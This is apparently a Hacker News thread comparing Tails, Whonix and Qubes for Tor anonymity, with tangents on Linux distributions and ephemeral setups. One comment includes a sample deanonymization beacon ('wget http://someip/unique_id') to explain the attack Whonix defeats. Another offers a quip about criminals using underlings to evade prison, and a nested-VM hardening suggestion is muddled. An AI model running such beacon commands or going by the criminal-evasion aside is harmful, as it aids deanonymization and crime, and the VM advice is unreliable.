There may be a security advantage to using a separate non-bypassable network appliance that puts your traffic on Tor, since then it would be much harder to break into a Tails machine and make it leak your location. However, given that it's meant to be easy to use, I think they probably picked the right balance by having the Tor redirecting occur in the same address space as the computing environment.
All known law enforcement attacks against Tor have involved some kind of exploit (e.g., in Tor Browser) that creates a non-Tor connection to collect the user's IP. Tails does not protect against this. Whonix provides much stronger protection against practical, real-world attacks, since the entire operating system is forced through a Tor connection.
It’s probably important to note that as I understand it, these attacks have generally been Firefox zero-day exploits that have made its way in because the Tor Browser is based on Firefox ESR with patches.
administrator/root is turned off by default, and even if the user turned it on during boot, they would still have to be tricked into approving or putting in their password again, am I missing something about the veracity of possible exploits?
Tails includes an "Unsafe Browser" which connects in the clear. So on top of a Firefox exploit, you would need another exploit to launch that browser or an exploit to escalate to root and tamper with the firewall rules. At least one Tails user has been successfully targeted like this ("an exploit taking advantage of a flaw in Tails’ video player to reveal the real IP address of the person viewing the video").[1] With Whonix, even an attacker with root would not be able to make a non-Tor connection because the firewall runs on a separate virtual machine.
wow! that story is wild I totally missed that during the pandemic. now I'm no longer annoyed at always having to update tails the few times I boot it up.
but yeah probably going to prioritize Qubes and whonix again.
I'm wary about even Googling it because I swear I heard you are tracked in the US for even Googling it, or downloading it, or even reading on Wikipedia. It sounds laughable when I type it to be honest, but hey. I feel I have better hills to die on.
Tails didn't patch a non-root exploit that could leak the users real IP by bypassing the firewall without them knowing it for 3 years. I do not understand why Tails is recommended over Whonix (specifically Qubes-Whonix, thus with a trusted TCB).
> The Unsafe Browser allows to retrieve the public IP address by a compromised amnesia user with no user interaction
It's been around for a while, but interesting to see this and a Fireship video on it the same day. I was wondering if they did some new release or something but doesn't seem like it
It seems like a growing number of things once referred to as Linux distributions are now referring to themselves as operating systems. If the kernel is Linux, and the user-space is GNU, what makes this a distinct operating system from, say, SUSE, or Arch?
The userspace is so diluted now that it’s basically flat out wrong to say it’s just ‘GNU’, I mean Systemd is probably an even bigger a part than GNU is now, and we’ve long had things like OpenSSH from BSD as pretty core parts of the system, and we’re not going to start calling a distribution ‘Kubuntu Linux/Systemd/GNU/BSD/KDE’ or whatever…
Basically about all something needs to be to be called an OS is a kernel and at least one userspace program that does something useful, so I’d definitely say every ‘Linux distribution’ has always counted as an operating system in itself (so ‘Linux distribution’ is just a specific subset of ‘operating systems’).
I like to thing of GNU/Linux as Linux with glibc. There’s software that only runs with glibc (eg: steam), and software that runs with various libc (eg: Firefox).
I’m not sure that it’s a widely accepted definition, but it’s often useful to describe what a software depends on. Does it require _just_ Linux, or does it also require glibc?
A distribution focuses on the distribution part (eg: a package manager, repositories, etc).
Some distributions are operating systems (eg: OpenBSD, ArchLinux, Debian). Some operating systems are not distributions (they don’t include a mechanism to pull packages. Eg: windows, macOS). Some distributions are not operating systems (eg: homebrew, Flatpak).
Tails focuses on the operating system side of things. It’s focus isn’t on package distribution and letting you install things, but on downloading a usable OS image. It’s still a distribution, but that’s more of a technicality.
I'd say the reason for that is marketing, or branding, or positioning the product, which are, as you wrote, essentially Linux distributions.
I find that even combinations that are supposed to be very similar (Linux kernel, same DE, same repos) can behave differently, and I guess this is because of how the distro maintainers set up the different parts and integrations in the system. So in this way, my MX Linux box is different from my Debian+KDE box.
I'm so tired of seeing this argument. Most "big" open-source projects are well funded. Usually the reason they don't support <<obvious thing>> is poor leadership, not funding.
Over the past two years Tails has received 500k USD in bitcoin alone:
I'd guess it is a matter of priorities (do you want the safest, best-tested environment, or something less tested?).
However, assuming the source is easily bootstrappable, someone should try producing an unofficial port to Arm and Risc V. I'm sure it would reveal some security holes, even if it isn't appropriate (yet) for tails' target audience.
I know the TOR project was started by the US navy, and that now I2Pnis the preferred method of browsing the darknet, because many people believe it has been compromised.
In the same manner that parts of the NSA are interested in secure cryptography as opposed to breaking it, parts of the Navy were interested in anonymizing traffic as opposed to de-anonymizing.
> and that now I2Pnis the preferred method of browsing the darknet
This is not true by any means. A "switch" to I2P never happened, and just a few months ago an exploit[1] that could deanonymize eepsites was published. Tor is still the only "method of browsing the darknet"; by most definitions.
The TOR software is likely no more compromised than GNU/Linux generally -- the TOR _network_ is likely compromised by flooding it with honeypot servers that can track users by monitoring origins and destinations.
Distrowatch is a good place to get a brief overview of pretty well every Linux distribution ever made, with links and a bit of background info on each:
I think that's an incorrect oversimplification. The Internet didn't grow from ARPANET like a seed grows into a tree. ARPANET didn't become bigger and bigger until it became the Internet. The Internet was the merger of many networks and many of them never communicated with any computer in ARPANET and we're developed with absolutely zero funding from the United States government.
I guess it’s a matter of interpretation. Of course every computer connected to the internet is not government-funded. But in this context we’re talking about the origin of the technology and protocols that allowed the network to exist at all. By the time the internet got bigger than ARPANet, CSNET, and NSFNET (all government funded), the protocols were pretty much settled, and that’s what everyone else’s network used to become part of the internet. If the government hadn’t gotten it to that point, there would be no internet.
I can't validate if you are wrong or not. Just bring to your attention that one of their marketing slogan is "Amnesia" and "Persistent Storage on a USB stick". https://tails.net/about/index.en.html
The 'honeypot' concern is somehow valid because full-on privacy on the internet is as hard to achieve as privacy in a public park. Only its user can determine if their online activities goes against the (legal/moral/financial) interests of the most technically-advanced nation on our planet.
The Tails team made the fantastic decision of modifying the Tor Browser, giving Tails users a unique fingerprint as opposed to regular Tor Browser users.
Tails is great. I am using it for several years now.
Other related projects are whonix ( https://www.whonix.org ), which consists of two virtual machines:
A workstation to work on and a gateway, which torifies all traffic from the workstation VM.
Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple seperate whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor including system upgrades of the host OS itself.
Whonix/Qubes integration is excellent, and it's certainly a nice perk of Qubes.
To clarify the benefits of the "two VM" approach:
Most of the unmasking exploits against Tor users (as distinguished from unmasking Tor hidden services) involve getting a browser to ignore the proxy settings, somehow. I believe WebRTC, Flash, and various other things have been used to cause the browser to beacon out to some endpoint - you exploit the kitty picture site, and put in code to exploit the browser, which then makes a direct request to http://someip/unique_identifier - and, boom, you've got the user's IP, probable cause, the works.
This happens because a "typical" Tor install is the daemon running locally, but nothing prevents other binaries from making a direct connection out. You set the browser to use socks5://localhost:9050 or something as the proxy, but if you can either get some part of it to misbehave, or just spawn off a different process, it doesn't obey the proxy settings and goes straight out.
Whonix solves this problem by splitting the system into the workstation VM (what you interact with) and the gateway VM (that connects to Tor and "torifies" traffic). The only network port on the workstation VM is connected to the input port on the gateway VM - and everything coming in that port is routed through Tor, via the other (internet connected) port.
So, if you manage to exploit the workstation VM, the attacker still doesn't gain an IP - because they launch a shell that runs 'wget http://someip/unique_id', but that goes out through the gateway VM, and gets encapsulated into Tor before going out, so it still pops out some Tor exit node, not your home IP address.
It raises the bar rather substantially for using Tor, and avoids a lot of the various ways to get Tor to leak. Also, they ship a copy of the Tor Browser in Whonix, which disables a lot of high risk functionality and allows you to very easily disable automatic media parsing and Javascript and such.
Qubes is awesome, and the integrated Whonix stuff is just a beautiful integration.
> The steps below outline how to make all PVH DispVM's permanently fully ephemeral. All data written to the disk will be encrypted with an ephemeral encryption key only stored in RAM. The encryption and encryption key generation is handled by dom0 and is thus inaccessible to the VM.
Legit question. IIUC: On the publishing side, it allows people to say things with less fear of bad guys knowing who said them. On the audience side, it allows people to consume media with less fear of bad guys knowing they read it. Unfortunately, I don't believe it can ameliorate what most people think of as the censorship part, which is a guy with a black magic marker crossing out parts of things.
> it allows people to say things with less fear of bad guys knowing who said them
I see what you are saying, but AFAIK, the technology is neutral as far as good or bad goes. One could say it lets a person say and do things with less fear of consequences in general.
If you get canceled and ISPs refuse to give you service Tor is not able to somehow bypass that censorship. If the server your hidden service is hosted on is taken away in a raid. Tor doesn't help you there.
Providing limited protection from being deanonymized doesn't mean that you can no longer be censored.
Obviously! Assassination or imprisonment could also be considered censorship and tor or tails won't help. There are always edge cases. They are pretty explicit about their threat model and go into great lengths explaining it.
Is there anything Tails does to actively bypass censorship, or is it simply a result of the increased anonymity?
To me, it seems like it can only have limited utility in this regard. For example, Tails (and Tor) isn't going to help you avoid private sector censorship on services like X or Facebook or YouTube, right? It won't help you get a book published or reach an audience with a video.
I'm not really sure what you understand the word "bypass" to mean here?
Tor/Tails can certainly help someone who is experiencing censorship to publish a book or distribute a video in a different region where that censorship does not exist. That bypasses the censorship. For example someone experiencing censorship could contact a publisher or distributor in a different location and transmit the book or video to them.
If censorship exists on Twitter, publishing items to Twitter isn't bypassing Twitter's censorship. You may be bypassing automated censorship or some mechanism but Twitter would still be censored.
The same goes for books. There's no tool that is going to keep a book on the shelves of a library that wants to burn the book. Bypassing the library's censorship means getting the book to readers despite the library's censorship.
Does it not become cumbersome to use the web for normal usage without persistent cookies, history, bookmarks, ...? If you save those to persistent storage (if that's even possible, I imagine Tails has safeguards against shooting yourself in the foot), you lose one of the main reasons why people use Tails.
Love Tails, but I haven't used it in ten years. I have had Tails and Qubes disposable VMs on my mind though.
I switched off of Qubes last year to my own Alpine chroot with a hand crafted kernel and initrd that lives only in memory. I find turning off the computer when I'm finished and having it forget everything to be a very peaceful way to compute. I owe the internet a write up.
I feel like ramfs for root filesystems is an underused pattern more broadly. "Want to upgrade? Just reboot. Fallback? Pick a different root squashfs in the grub menu"
I would definitely be interested in reading more about this.
I love the idea of being able to prevent an application from writing all over my disk to random places. If I can't prevent it, I can at least remedy it by having all those changes go away with a reboot.
One of the things I love about Docker containers is that they can be ephemeral or persistent, short or long term, have full network access or no access, allowed to write to the host system or stuck writing to its own file system only.
Ages ago, I tried out Puppy Linux, that ran from a burned CD. If I made updates, it wrote another filesystem extent to the disc, and I think the loading process just used those to over-write files as needed until the boot completed.
I was thinking of it for a home firewall at the time, but in any case, it made for a very ephemeral system.
Same here. Dont understand why not more ppl switched to alpine on the desktop. It is my daily driver. Plus LXD for stuff I must do (typically spawn ubuntu, etc.)
my whole PDE (Personal Developer Environment) is within a container. Need python? Shell into (via dmenu) python container. All with complete neovim setup. Need a GUI? No problem. Spawn a container. My lxd profile is set up for this. Use chezmoi for heavy automated stuff.
I also use alpine as the main/root environment. But I rarely use any applications from alpine. For that I have Arch, Fedora and Debian rootfs dirs into which I pivot_root with the help of bubblewrap (bwrap) in shell scripts. There is no overhead and the GPU can be easily attached. You can also dynamically attach ro/rw CWD and target paths (`for arg in "$@"`).
Everything that I care about just works and I get a separation of concerns. Use of network namespaces allows further flexibility. For example, I have a netns that is forced through a Tor gateway such that any traffic originating in it can only go through Tor.
This type of setup is not hardened against kernel vulnerabilities, the kernel treats applications running in namespaces as if they are isolated from other namespaces but those applications can still interact with broad surfaces of the kernel and therefore potentially exploit it.
For kernel safety applications must be denied direct access to the host kernel, this is usually achieved with virtual machines.
Do you have a separate neovim instance (config and all) in every container? Or a single neovim instance on the host which can access all container volumes? What about shell instances?
> Dont understand why not more ppl switched to alpine on the desktop.
Same. When I was looking for a minimalistic distro, while unorthodox it seemed better than the alternatives. My next choice would be Void but I ran into some issues with it, and Alpine worked much more flawlessly.
I have multiple flakes and a lotta CUDA drivers. In fairness though, this is after a few months of no manual GC. I think nix-collect-garbage could bring it down to ~120-150gb.
It's totally worth the stability, but maybe not the best choice for the storage-constrained.
EDIT: According to nix-tree my current generation is only 45gb right now.
I'm so sick of this claim. Nix allows you to keep old versions of things installed, but you certainly don't have to.
When I switched from Debian to NixOS a few years ago, I installed it on a separate subvolume, and it ended up taking almost exactly as much space as Debian did (about 12 GiB with gnome and everything else). And really, what would you expect? It's nearly all the same code, just organized differently in the filesystem.
P.S., you can check the store usage of the current system profile with `nix path-info -Sh /run/current-system`.
How do Tails and Qubes relate, any reuse of functionality?
(Tried Qubes as written up in [1] but eventually gave up as it won't allow me to create virtualbox images, and some other caveats, as well as being pretty resource hungry)
I've been needing to create virtualbox images for use in some courses (teaching data science and the like) at my previous work. This usecase has popped up often enough that I feel O need to be able to do this on my main laptop.
I treat my web browser like this, and similarly have a docker container for all my development stuff. I like the idea of making the computer (almost) completely stateless.
How do you deal with stuff you want to store in /home? (Like source code checkouts, ssh keys, etc.)
Tails is one of those tools I always keep on me physically. Added it to my key ring 6 years ago , and I get use out of it at least twice a month. Also started using it as a recovery ISO. But my main use case is when I have to use a computer but don’t have mine around . Just pop the USB in and voila all the access I need and my data stored in the persistent partition.
I also spent most of my internship long ago researching secure operating systems for the analysts of the company I worked for and Tails was the best fit with Qubes being second due to how power hungry it is. Another was subgraph but at the time it wasn’t properly developed. Overall if you need a OS that guarantees that all your traffic is anonymised via Tor and that it is ephemeral Tails is superb.
I've heard bad things about Tails over the last few years.
What with the UK planning to pass that online safety bill, I decided to try out Whonix (which involved learning curves when it came to Linux), which I think is a better way of keeping safe online.
As one of the comments mentioned below, easy for someone to get your IP with an attack on the Tor browser. (Which was actually utilized by law enforcement to catch somebody iirc.)
Anecdotal evidence, but I've heard numerous complaints from other users about telemetry settings being enabled in the browser and locked.
where is darknet opsec and the current state of things discussed?
I used to use Dread and various DNM forums to find people to talk with and read their threads. It was usually far more complex and nuanced than what I would find on clearnet
but its been like 2-3 years since any Tor services even worked reliably with this ongoing DDOS attack.
I’d like to highlight the update process . I had a 2-3 year old installation and updated using the in-app updater. Update was a breeze and persistent storage was saved.
I recently had to dust off tails to do some dark web research on a data breach.
It’s a great “prophylactic” to protect your assets from possible malware while doing research.
Wouldn't that be security through obscurity? Which is bad security and a good way to be exploited. I thought that having more eyes on a system made it more secure because people find the exploits.
It depends. Monocultures are also bad for computer security, since the failure mode is catastrophic.
Ideally, there would be a few tails-style projects competing with each other (there are; see sibling threads), and the internet would be more federated (for instance, if github is completely compromised right now, many people reading this will git pull malware in the next day or so).
"Many eyes" is a failed philosophy. Even if many people could, theoretically, look at the code few actually do as evidenced by the Heartbleed defect in OpenSSL. One of the most critical pieces of software, used by literally billions of consumers and basically every trillion dollar company, and they missed glaring coding errors that any basic static analyzer would automatically tag. Nobody was looking at even some of the most critical code. The first failure is that you need people actually looking, which basically requires being paid to do full-time work (as most work on Linux is these days).
In addition, even if people are looking, finding defects is really hard. A random onlooker has basically a 0% chance to find most of the critical zero-days afflicting Linux. It takes weeks to months of dedicated effort by technical experts with domain knowledge to find most such bugs. "Many eyes" is worthless to security, what you need is many trained technical experts with domain knowledge using high quality techniques and processes derived from successful high security projects.
This is not to say that "security through obscurity" is a good thing or that "open source" has no impact. Open source and development does have a large impact, it is just mostly on your ability to trust the auditing/security process as a random third-party, not the security itself. The security itself demands focused technical ability. However, the ability to trust the security claims derives from a technical evaluation by a technically competent, trusted party. The easiest way to do that if you are technically competent is to do it yourself. However, few people have that sort of time, so you farm out the work. If you are a big company or the government, you can usually get access to the source code under appropriate contractual protection, then you have your own technical staff (technically competent, trusted party) do the evaluation. If you are a smaller company, you might not have any technical staff appropriate for the task so you farm it out to a testing body (technically competent) who can probably be trusted since you are paying them.
However, if you are just some random person, you do not have the money to pay for a evaluation and you have no way of knowing if "Totally Not the NSA Certification Company" can be trusted. So, your best bet is inherent transparency and hoping that the unaffiliated lookers are, on average, not your enemy and technically competent. This is a okay option if you do not have access to better choices, and certainly better than nothing, but is a far cry from the other options where you have real control, incentive alignment, and insight into auditing processes. Only a organization incompetent at security would not use one of the better options for critical dependencys. Unfortunately, basically every large commercial IT organization, such as Google, Microsoft, Apple, Amazon, Crowdstrike, etc. is incompetent at security and none of them actually evaluate their dependencies or do any meaningful third-party certifications.
Funnily enough, this means my advice is practically useless, because the security of everybody is completely untrustworthy. Your only hope is "many eyes" because that is the only way to get any trustable audit at all. In the physical industries you have standards and certification bodies worth more than the paper they are written on, but in software everything in security is total snake oil and you should only believe what you can see for yourself. Hope that helps.
I think this is somewhat sarcastic but the article goes as far as saying "[Tor Browser Bundle] is the only reason that FireFox is a valuable target." Firefox has improved sandboxing now though I don't think it's as good as Chromium.
If I were wanting do do secure tor browsing, I would use a liveUSB of ubuntu, running virtualbox, running vmware, running tor. On the host ubuntu, I would run a 2nd instance of virtualbox, running vmware, running Chrome.
Networking will be set up so the Chrome inner VM can ssh to the tor VM. The tor VM can access only some whitelisted tor nodes.
Now an adversary that uses a Chrome exploit needs to break out of Windows and 2 layers of VM's before they get to my host. Breaking out of a VM is fairly doable, but breaking out of two will require lots of zero-days chained together (expensive).
It's a bit more secure if you use a proper write once DVD as well to read the live cd. It's a bit slower to boot but the best way to prevent persistence is always to make it virtually physically impossible by not having any physical storage mediums connected
Honestly, if this is a serious concern and you're already willing to go to all the other trouble, you may as well do your most sensitive Internet browsing from your car, connecting only to public WiFi in parking lots, in cities you don't actually live in, and never stay connected for more than a few hours at at time. Or take a hint from history's most secure criminals and don't do any of this yourself at all. Use paid underlings who fear you more than they fear prison and are willing to do time rather than rat you out.
You can increase the number of hops to make it very difficult. Guard nodes are pinned, so they might know who uses and who doesnt use Tor (doesnt matter if you arent using a bridge).
You can also set up your own exit/guard node and configure Tor accordingly. While not a recommended setup, it works pretty reliably.
I love the idea of Tails. It is unfortunate that it only runs on Intel macOS.
I consider my personal setup to be pretty good, but not Tails grade privacy: 1. Avoid installing apps, use Safari with all possible privacy settings. 2. Run Lockdown mode iOS, iPadOS, and macOS. 3. Use duck duck go and ProtonMail. 4. Prefer to run in Safari private browsing tabs. 5. Become non-private when logging into Amazon to make a purchase, etc.
I would love it if people more knowledgeable than I could critique my setup, make suggestions. Thanks in advance.
I would like to mention Cory Doctorow’s excellent new book The Internet Con [1]. It carries on in the fine tradition of the books Surveillance Capitalism and Privacy is Power for the narrative that regular law abiding people also benefit from doubling down on privacy.
Sure, but that's not what parent said. He said it only runs on "intel macOS", which is false. It works on non-Apple computers as well.
But I understand the miscommunication, parent meant to say "of the Apple computers, it only runs on Intel ones". There is a world outside of Apple, you know :-)
It's an emphasis thing. You can't tell in text where the emphasis is. In this case it was super clear that it was "intel macOS", but yea, it should have been "intel macs".
Tails works fine on IBM-PC compatible laptops and desktops with Intel compatible chips, which is nearly all laptops. I presume you meant that Tails doesn't run on ARM Macs?
If you only have an ARM Mac, it's easy to get an old IBM-compatible laptop and run Tails. What matters is a decent speed of USB stick, and today they're generally decent. I find it helpful for testing some things, I can reboot and get to a known state.
Being blunt: your setup doesnt protect you from Apple. Websites will and does recognize you on every visit, both those done in private tabs and the usual ones. DDG and ProtonMail i cant comment on, but they are one of the better choices for the less tech-savvy/i-want-to-spend-my-free-time-having-fun. You have a pretty nice setup in terms of security, however.
If you want better protection for websites identifying you, you should consider researching on browser fingerprinting (which is extremely hard, if not impossible to do on Safari). If you want better protection overall, ditch Apple.
191 comments
[ 2.8 ms ] story [ 241 ms ] threadTo be clear, I'm a fan of the product -- just wondering what the other side of the story is.
https://heads.dyne.org/about.html
https://distrowatch.com/table.php?distribution=heads
What information do you have to the contrary?
Assuming there was an exploit that broke out of the Firefox sand box you are correct that any connection is via tor.
Though tails isn't 100% sure, you could chain a Firefox cve + user land to root and then turn off the to routing rules.
One that comes to mind is dirty sock[0]. It uses a vulnerability in the snap api to create a root user.
https://github.com/initstring/dirty_sock/blob/master/dirty_s...
[1] https://www.vice.com/en/article/v7gd9b/facebook-helped-fbi-h...
but yeah probably going to prioritize Qubes and whonix again.
> The Unsafe Browser allows to retrieve the public IP address by a compromised amnesia user with no user interaction
https://gitlab.tails.boum.org/tails/tails/-/issues/15635
https://daserste.ndr.de/panorama/xkeyscorerules100.txt
https://en.wikipedia.org/wiki/Tails_(operating_system)
Basically about all something needs to be to be called an OS is a kernel and at least one userspace program that does something useful, so I’d definitely say every ‘Linux distribution’ has always counted as an operating system in itself (so ‘Linux distribution’ is just a specific subset of ‘operating systems’).
I’m not sure that it’s a widely accepted definition, but it’s often useful to describe what a software depends on. Does it require _just_ Linux, or does it also require glibc?
Some distributions are operating systems (eg: OpenBSD, ArchLinux, Debian). Some operating systems are not distributions (they don’t include a mechanism to pull packages. Eg: windows, macOS). Some distributions are not operating systems (eg: homebrew, Flatpak).
Tails focuses on the operating system side of things. It’s focus isn’t on package distribution and letting you install things, but on downloading a usable OS image. It’s still a distribution, but that’s more of a technicality.
I find that even combinations that are supposed to be very similar (Linux kernel, same DE, same repos) can behave differently, and I guess this is because of how the distro maintainers set up the different parts and integrations in the system. So in this way, my MX Linux box is different from my Debian+KDE box.
Over the past two years Tails has received 500k USD in bitcoin alone:
https://www.blockchain.com/explorer/addresses/btc/bc1qjg53lw...
You can also surmise that they receive ~200k/yr from official sponsors:
https://tails.net/sponsors/index.en.html
Then you have all the paypal, bank, cash donations.
Is it enough to add support for a second arch that is fully supported upstream (they ship a customized Debian)? You decide.
However, assuming the source is easily bootstrappable, someone should try producing an unofficial port to Arm and Risc V. I'm sure it would reveal some security holes, even if it isn't appropriate (yet) for tails' target audience.
In which case, it should be pretty secure.
Although, there's the obvious 'honeypot' concern.
But maybe I'm thinking of another distro, that ran from RAM and didn't write anything to disk.
This is not true by any means. A "switch" to I2P never happened, and just a few months ago an exploit[1] that could deanonymize eepsites was published. Tor is still the only "method of browsing the darknet"; by most definitions.
[1]: https://xeiaso.net/blog/CVE-2023-36325
https://distrowatch.com/
The 'honeypot' concern is somehow valid because full-on privacy on the internet is as hard to achieve as privacy in a public park. Only its user can determine if their online activities goes against the (legal/moral/financial) interests of the most technically-advanced nation on our planet.
Other related projects are whonix ( https://www.whonix.org ), which consists of two virtual machines:
A workstation to work on and a gateway, which torifies all traffic from the workstation VM.
Whonix is also integrated in Qubes OS ( https://www.qubes-os.org ), which allows you to easily work with multiple seperate whonix VMs. There is also the possibility to tunnel all internet traffic of your machine through Tor including system upgrades of the host OS itself.
To clarify the benefits of the "two VM" approach:
Most of the unmasking exploits against Tor users (as distinguished from unmasking Tor hidden services) involve getting a browser to ignore the proxy settings, somehow. I believe WebRTC, Flash, and various other things have been used to cause the browser to beacon out to some endpoint - you exploit the kitty picture site, and put in code to exploit the browser, which then makes a direct request to http://someip/unique_identifier - and, boom, you've got the user's IP, probable cause, the works.
This happens because a "typical" Tor install is the daemon running locally, but nothing prevents other binaries from making a direct connection out. You set the browser to use socks5://localhost:9050 or something as the proxy, but if you can either get some part of it to misbehave, or just spawn off a different process, it doesn't obey the proxy settings and goes straight out.
Whonix solves this problem by splitting the system into the workstation VM (what you interact with) and the gateway VM (that connects to Tor and "torifies" traffic). The only network port on the workstation VM is connected to the input port on the gateway VM - and everything coming in that port is routed through Tor, via the other (internet connected) port.
So, if you manage to exploit the workstation VM, the attacker still doesn't gain an IP - because they launch a shell that runs 'wget http://someip/unique_id', but that goes out through the gateway VM, and gets encapsulated into Tor before going out, so it still pops out some Tor exit node, not your home IP address.
It raises the bar rather substantially for using Tor, and avoids a lot of the various ways to get Tor to leak. Also, they ship a copy of the Tor Browser in Whonix, which disables a lot of high risk functionality and allows you to very easily disable automatic media parsing and Javascript and such.
Qubes is awesome, and the integrated Whonix stuff is just a beautiful integration.
Qubes-Whonix with fully ephemeral disposable VMs is the future. It would be a total killer for nearly every use case of Tails besides ease of use.
Note that this is in the works, but not fully implemented by default yet. https://github.com/anywaydense/QubesEphemerize
> The steps below outline how to make all PVH DispVM's permanently fully ephemeral. All data written to the disk will be encrypted with an ephemeral encryption key only stored in RAM. The encryption and encryption key generation is handled by dom0 and is thus inaccessible to the VM.
I see what you are saying, but AFAIK, the technology is neutral as far as good or bad goes. One could say it lets a person say and do things with less fear of consequences in general.
Providing limited protection from being deanonymized doesn't mean that you can no longer be censored.
https://tails.net/doc/about/warnings/index.en.html
To me, it seems like it can only have limited utility in this regard. For example, Tails (and Tor) isn't going to help you avoid private sector censorship on services like X or Facebook or YouTube, right? It won't help you get a book published or reach an audience with a video.
Tor/Tails can certainly help someone who is experiencing censorship to publish a book or distribute a video in a different region where that censorship does not exist. That bypasses the censorship. For example someone experiencing censorship could contact a publisher or distributor in a different location and transmit the book or video to them.
If censorship exists on Twitter, publishing items to Twitter isn't bypassing Twitter's censorship. You may be bypassing automated censorship or some mechanism but Twitter would still be censored.
The same goes for books. There's no tool that is going to keep a book on the shelves of a library that wants to burn the book. Bypassing the library's censorship means getting the book to readers despite the library's censorship.
What are the main benefits you get from using Tails OS?
What downsides do you tolerate because of the benefits?
I switched off of Qubes last year to my own Alpine chroot with a hand crafted kernel and initrd that lives only in memory. I find turning off the computer when I'm finished and having it forget everything to be a very peaceful way to compute. I owe the internet a write up.
I feel like ramfs for root filesystems is an underused pattern more broadly. "Want to upgrade? Just reboot. Fallback? Pick a different root squashfs in the grub menu"
I would definitely be interested in reading more about this.
I love the idea of being able to prevent an application from writing all over my disk to random places. If I can't prevent it, I can at least remedy it by having all those changes go away with a reboot.
One of the things I love about Docker containers is that they can be ephemeral or persistent, short or long term, have full network access or no access, allowed to write to the host system or stuck writing to its own file system only.
I'm in control instead of the application.
I was thinking of it for a home firewall at the time, but in any case, it made for a very ephemeral system.
my whole PDE (Personal Developer Environment) is within a container. Need python? Shell into (via dmenu) python container. All with complete neovim setup. Need a GUI? No problem. Spawn a container. My lxd profile is set up for this. Use chezmoi for heavy automated stuff.
My base alpine system always stays clean.
Everything that I care about just works and I get a separation of concerns. Use of network namespaces allows further flexibility. For example, I have a netns that is forced through a Tor gateway such that any traffic originating in it can only go through Tor.
This type of setup is not hardened against kernel vulnerabilities, the kernel treats applications running in namespaces as if they are isolated from other namespaces but those applications can still interact with broad surfaces of the kernel and therefore potentially exploit it.
For kernel safety applications must be denied direct access to the host kernel, this is usually achieved with virtual machines.
And that is what QubesOS does, if I understand correctly?
I think one reason might be musl and its compatibility.
My desktop is FreeBSD but I have a few alpine servers for docker and other Linux specific stuff.
And FreeBSD is even less Gnu-Linux compatible than Alpine yet everything works fine. Thanks to an army of port maintainers of course.
https://gist.github.com/kspacewalk/52ea8f0c383f57a34042db2a0...
Access via http://localhost:8080/vnc.html
From my neomvim container I can use the local terminal or I can ssh to the host to run my other containers.
Same. When I was looking for a minimalistic distro, while unorthodox it seemed better than the alternatives. My next choice would be Void but I ran into some issues with it, and Alpine worked much more flawlessly.
https://nixos.wiki/wiki/Impermanence
Also NixOs has absurd levels of control for upgrades, rollbacks, and control over the build and resulting files.
I have 45G, and this computer is more than two years old
It's totally worth the stability, but maybe not the best choice for the storage-constrained.
EDIT: According to nix-tree my current generation is only 45gb right now.
When I switched from Debian to NixOS a few years ago, I installed it on a separate subvolume, and it ended up taking almost exactly as much space as Debian did (about 12 GiB with gnome and everything else). And really, what would you expect? It's nearly all the same code, just organized differently in the filesystem.
P.S., you can check the store usage of the current system profile with `nix path-info -Sh /run/current-system`.
(Tried Qubes as written up in [1] but eventually gave up as it won't allow me to create virtualbox images, and some other caveats, as well as being pretty resource hungry)
[1] https://bionics.it/posts/installing-qubes-os
What's the use case[1] for VirtualBox images in an operating system designed around virtualization with Xen? You can simply create a Xen VM.
[1]: Note that I'm asking a question here, not invalidating your experience.
How do you deal with stuff you want to store in /home? (Like source code checkouts, ssh keys, etc.)
This is the discussion regarding support for ARM, it's currently not supported.
https://www.youtube.com/watch?v=mVKAyw0xqxw
Short and informative :-)
https://www.youtube.com/watch?v=_k-F-MMvQV4
What with the UK planning to pass that online safety bill, I decided to try out Whonix (which involved learning curves when it came to Linux), which I think is a better way of keeping safe online.
Like what?
Anecdotal evidence, but I've heard numerous complaints from other users about telemetry settings being enabled in the browser and locked.
But worst of all, it uses GNOME.
https://www.schneier.com/blog/archives/2020/06/facebook_help...
I used to use Dread and various DNM forums to find people to talk with and read their threads. It was usually far more complex and nuanced than what I would find on clearnet
but its been like 2-3 years since any Tor services even worked reliably with this ongoing DDOS attack.
dark.fail has been down too
I hear people moved to i2p but WHERE?
I recently had to dust off tails to do some dark web research on a data breach.
It’s a great “prophylactic” to protect your assets from possible malware while doing research.
I suspect you're better off with a more obscure project, because then your adversary is less likely to have a 'ready to go' exploit.
Ideally, there would be a few tails-style projects competing with each other (there are; see sibling threads), and the internet would be more federated (for instance, if github is completely compromised right now, many people reading this will git pull malware in the next day or so).
In addition, even if people are looking, finding defects is really hard. A random onlooker has basically a 0% chance to find most of the critical zero-days afflicting Linux. It takes weeks to months of dedicated effort by technical experts with domain knowledge to find most such bugs. "Many eyes" is worthless to security, what you need is many trained technical experts with domain knowledge using high quality techniques and processes derived from successful high security projects.
This is not to say that "security through obscurity" is a good thing or that "open source" has no impact. Open source and development does have a large impact, it is just mostly on your ability to trust the auditing/security process as a random third-party, not the security itself. The security itself demands focused technical ability. However, the ability to trust the security claims derives from a technical evaluation by a technically competent, trusted party. The easiest way to do that if you are technically competent is to do it yourself. However, few people have that sort of time, so you farm out the work. If you are a big company or the government, you can usually get access to the source code under appropriate contractual protection, then you have your own technical staff (technically competent, trusted party) do the evaluation. If you are a smaller company, you might not have any technical staff appropriate for the task so you farm it out to a testing body (technically competent) who can probably be trusted since you are paying them.
However, if you are just some random person, you do not have the money to pay for a evaluation and you have no way of knowing if "Totally Not the NSA Certification Company" can be trusted. So, your best bet is inherent transparency and hoping that the unaffiliated lookers are, on average, not your enemy and technically competent. This is a okay option if you do not have access to better choices, and certainly better than nothing, but is a far cry from the other options where you have real control, incentive alignment, and insight into auditing processes. Only a organization incompetent at security would not use one of the better options for critical dependencys. Unfortunately, basically every large commercial IT organization, such as Google, Microsoft, Apple, Amazon, Crowdstrike, etc. is incompetent at security and none of them actually evaluate their dependencies or do any meaningful third-party certifications.
Funnily enough, this means my advice is practically useless, because the security of everybody is completely untrustworthy. Your only hope is "many eyes" because that is the only way to get any trustable audit at all. In the physical industries you have standards and certification bodies worth more than the paper they are written on, but in software everything in security is total snake oil and you should only believe what you can see for yourself. Hope that helps.
I think this is somewhat sarcastic but the article goes as far as saying "[Tor Browser Bundle] is the only reason that FireFox is a valuable target." Firefox has improved sandboxing now though I don't think it's as good as Chromium.
Networking will be set up so the Chrome inner VM can ssh to the tor VM. The tor VM can access only some whitelisted tor nodes.
